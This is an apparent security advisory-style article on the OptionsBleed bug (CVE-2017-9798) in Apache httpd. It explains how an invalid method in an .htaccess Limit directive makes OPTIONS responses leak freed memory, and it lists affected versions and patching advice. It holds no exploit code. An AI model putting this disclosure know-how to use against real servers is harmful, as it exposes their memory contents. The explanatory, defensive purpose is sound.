Introduction:We all know about’Heartbleed’ in OpenSSL, in which you can make the target server respond toyour request with more data than originally asked for. Instead of ignoring yourmalformed request, the server responds with sensitive data which is notintended for you. A quite similar bug has been found recently, not in OpenSSLbut the program called ‘httpd’ which belongs to Apache Web Server.
Thisvulnerability has been termed as ‘OptionsBleed’, as the leakage ofinformation occurs while we send a request to the vulnerable Apache Web Serverusing ‘OPTIONS’ method. Let us dive in and take a deeper look into this bug,which has been designated as CVE-2017-9798.Background:The HTTP OPTIONSmethod lets us know which HTTP methods are allowed on our target server. Whenwe send a request using OPTIONS, the server response contains all the allowedmethods, in the ‘Allow:’ header.For example: HTTP/1.1 200 OK Allow: OPTIONS,TRACE, GET, HEAD, POST, PUT Public:OPTIONS, TRACE, GET, HEAD, POST, PUT Content-Length:0 Date: Wed, 20 Sep 2017 15:08:56 GMT During anexperiment, researcher Hanno Böck observedthat some servers responded with corrupted responses to OPTIONS method, suchas: Allow: GET,HEAD,OPTIONS,, HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST, HEAD,!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd” These kinds ofresponses clearly suggested a bleed sort of information disclosure, which ledto the conclusion that all those leakage occurred from some particular versionsof Apache servers.What is actuallyhappening?In the .htaccess fileof an Apache Web Server, the directive ‘limit’ is used to restrict the access of specific HTTPmethods for some specific users.
If the attacker sets a directive in the .htaccessfile for an invalid method, the corruption happens. Setting up an invalidmethod in the ‘limit’ directive makes Apache free up memory, but Apache continuesto refer to that memory, even when the memory is in use for another program.Therefore, when you send an HTTP OPTIONS request to the server, it gives youback information about the program which is running on the freed-up memory inthe ‘Allow’ header.Affected Versions:· Apache Web Server2.
2.34 and previous.· Apache Web Server2.4.
27 and previous. Recommendations: · Apply necessarypatches available for the server.· Make sure you usean unaffected version.· Verify theconfiguration of .htaccess file for locally hosted Apache Web Server.· Before applyingthe patch, make sure that no unauthorized modifications of the system have beenmade.· Frequentlyvalidate what kind of content is being uploaded.Useall software as least-privilege user.